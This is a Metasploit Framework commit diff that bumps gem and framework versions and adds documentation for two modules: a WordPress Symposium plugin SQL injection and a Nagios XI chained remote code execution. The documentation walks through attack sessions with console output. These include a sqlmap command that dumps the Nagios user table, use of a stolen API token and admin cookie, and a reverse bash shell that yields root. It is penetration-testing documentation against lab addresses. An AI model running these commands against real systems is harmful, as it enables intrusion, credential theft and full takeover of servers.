sempervictus
diff --git a/‎Gemfile.lock
Lines changed: 5 additions & 5 deletions b/‎Gemfile.lock
Lines changed: 5 additions & 5 deletions
diff --git a/‎documentation/modules/auxiliary/admin/http/wp_symposium_sql_injection.md
Lines changed: 65 additions & 0 deletions b/‎documentation/modules/auxiliary/admin/http/wp_symposium_sql_injection.md
Lines changed: 65 additions & 0 deletions
diff --git a/‎documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md
Lines changed: 114 additions & 0 deletions b/‎documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md
Lines changed: 114 additions & 0 deletions
diff --git a/‎lib/metasploit/framework/version.rb
Lines changed: 1 addition & 1 deletion b/‎lib/metasploit/framework/version.rb
Lines changed: 1 addition & 1 deletion
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.13.3)
+    metasploit-framework (4.13.5)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -104,7 +104,7 @@ GEM
     bcrypt (3.1.11)
     bit-struct (0.15.0)
     builder (3.2.2)
-    capybara (2.10.1)
+    capybara (2.11.0)
       addressable
       mime-types (>= 1.16)
       nokogiri (>= 1.3.3)
@@ -170,7 +170,7 @@ GEM
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
     metasploit-payloads (1.2.1)
-    metasploit_data_models (2.0.9)
+    metasploit_data_models (2.0.10)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
@@ -186,7 +186,7 @@ GEM
       mime-types-data (~> 3.2015)
     mime-types-data (3.2016.0521)
     mini_portile2 (2.1.0)
-    minitest (5.9.1)
+    minitest (5.10.1)
     msgpack (1.0.2)
     multi_json (1.12.1)
     multi_test (0.1.2)
@@ -234,7 +234,7 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (11.3.0)
     rb-readline-r7 (0.5.2.0)
-    recog (2.1.0)
+    recog (2.1.2)
       nokogiri
     redcarpet (3.3.4)
     rex-arch (0.1.2)
 
@@ -0,0 +1,65 @@
+## Vulnerable Application
+
+  The auxiliary/admin/http/wp_symposium_sql_injection works for WordPress
+  Symposium plugin before 15.8. The Pro module version has not been verified.
+
+  To download the vulnerable application, you can find it here:
+  https://github.com/wp-plugins/wp-symposium/archive/15.5.1.zip
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/admin/http/wp_symposium_sql_injection```
+  3. Do: ```set RHOST <ip>```
+  4. Set TARGETURI if necessary.
+  5. Do: ```run```
+
+## Scenarios
+
+  Example run against WordPress Symposium plugin 15.5.1:
+
+  ```
+  msf > use auxiliary/admin/http/wp_symposium_sql_injection
+  msf auxiliary(wp_symposium_sql_injection) > show info
+
+         Name: WordPress Symposium Plugin SQL Injection
+       Module: auxiliary/admin/http/wp_symposium_sql_injection
+      License: Metasploit Framework License (BSD)
+         Rank: Normal
+    Disclosed: 2015-08-18
+
+  Provided by:
+    PizzaHatHacker
+    Matteo Cantoni <[email protected]>
+
+  Basic options:
+    Name        Current Setting  Required  Description
+    ----        ---------------  --------  -----------
+    Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+    RHOST                        yes       The target address
+    RPORT       80               yes       The target port
+    SSL         false            no        Negotiate SSL/TLS for outgoing connections
+    TARGETURI   /                yes       The base path to the wordpress application
+    URI_PLUGIN  wp-symposium     yes       The WordPress Symposium Plugin URI
+    VHOST                        no        HTTP server virtual host
+
+  Description:
+    SQL injection vulnerability in the WP Symposium plugin before 15.8
+    for WordPress allows remote attackers to execute arbitrary SQL
+    commands via the size parameter to get_album_item.php.
+
+  References:
+    http://cvedetails.com/cve/2015-6522/
+    https://www.exploit-db.com/exploits/37824
+
+  msf auxiliary(wp_symposium_sql_injection) > set RHOST 1.2.3.4
+  RHOST => 1.2.3.4
+  msf auxiliary(wp_symposium_sql_injection) > set TARGETURI /html/wordpress/
+  TARGETURI => /html/wordpress/
+  msf auxiliary(wp_symposium_sql_injection) > run
+
+  [+] 1.2.3.4:80 - admin           $P$ByvWm3Hb653Z50DskJVdUcZZbJ03dJ. [email protected]
+  [+] 1.2.3.4:80 - pippo           $P$BuTaWvLcEBPseEWONBvihacEqpHa6M/ [email protected]
+  [+] 1.2.3.4:80 - pluto           $P$BJAoieYeeCDujy7SPQL1fjDULrtVJ3/ [email protected]
+  [*] Auxiliary module execution completed
+  ```
@@ -28,8 +28,22 @@ steps on the screen to configure the app.
 Configuration is actually not required to exploit the app, but you should do it
 anyway.
 
+## Options
+
+  **USER_ID**
+
+  If you wish to exploit a particular ```USER_ID```, that can be specified here.  Default is 1, which is most likely the admin account.
+  
+  **API_TOKEN**
+  
+  The SQLi included only works for MySQL, which should work in most cases.  However, if you experience a different backend, you can enumerate the user
+  table via sqlmap: ```sqlmap -u "http://[ip]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```.
+  Then you can set the ```USER_ID``` and ```API_TOKEN``` to skip those phases and move on to exploitation.  Default is empty.  See example below for more usage.
+
 ## Usage
 
+### Typical Usage
+
 Just set ```RHOST``` and fire off the module! It's pretty much painless.
 ```set VERBOSE true``` if you want to see details.
 
@@ -71,3 +85,103 @@ uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
 uname -a
 Linux localhost.localdomain 2.6.32-573.22.1.el6.x86_64 #1 SMP Wed Mar 23 03:35:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 ```
+
+### Emulating a different DB
+
+#### First we'll attempt the exploit and see what happens.
+
+```
+msf exploit(nagios_xi_chained_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_chained_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   API_TOKEN                   no        If an API token was already stolen, skip the SQLi
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST      192.168.2.218    yes       The target address
+   RPORT      80               yes       The target port
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   USER_ID    1                yes       User ID in the database to target
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.2.117    yes       The listen address
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Nagios XI <= 5.2.7
+
+
+msf exploit(nagios_xi_chained_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Nagios XI version: 5.2.7
+[*] Getting API token
+[+] 0 incidents resolved in Nagios IM
+
+[-] Exploit aborted due to failure: unexpected-reply: API token not found! punt!
+[*] Exploit completed, but no session was created.
+```
+
+#### Now lets try using sqlmap to enumerate the user table.
+
+```
+root@k:~# sqlmap -u "http://192.168.2.218/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump
+...snip...
+Database: nagiosxi
+Table: xi_users
+[2 entries]
++---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+| user_id | name                 | email             | enabled | username    | password                         | backend_ticket                                                   |
++---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+| 2       | admin2               | [email protected] | 1       | admin2      | c84258e9c39059a89ab77d846ddab909 | 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g |
++---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+
+...snip...
+```
+
+#### Re-target
+Now, we can set the ```USER_ID``` and ```API_TOKEN``` (backend_ticket)
+
+```
+msf exploit(nagios_xi_chained_rce) > set USER_ID 2
+USER_ID => 2
+msf exploit(nagios_xi_chained_rce) > set API_TOKEN 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+API_TOKEN => 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+msf exploit(nagios_xi_chained_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Nagios XI version: 5.2.7
+[*] Getting admin cookie
+[+] Admin cookie: nagiosxi=rjs4f9k4299v78hpgq3374q6j6;
+[+] CSRF token: c53d1f591264a3ea771639a7782627f8
+[*] Getting monitored host
+[+] Monitored host: localhost
+[*] Downloading component
+[*] Uploading root shell
+[*] Popping shell!
+[*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.218:51032) at 2016-10-10 10:15:08 -0400
+[*] Cleaning up...
+[*] rm -rf ../profile
+[*] unzip -qd .. ../../../../tmp/component-profile.zip
+[*] chown -R nagios:nagios ../profile
+[*] rm -f ../../../../tmp/component-ZEaGkiTW.zip
+
+1138255764
+NXEqynCVIfLzvpjUkqOovFvuLgsUrtpo
+CKorOSWlTQEkRoiwCiBqTgylyLQjuWxU
+oIGZxLofAStLsgsMNaGnQzzMuBYpJUQs
+fkUlWzVvhurgAATtxKhLSBFCxQaZqjtR
+QajRDDToeigHGMFdUbaClxkLfJbxqBKv
+whoami
+root
+```
@@ -30,7 +30,7 @@ def self.get_hash
         end
       end
 
-      VERSION = "4.13.3"
+      VERSION = "4.13.5"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash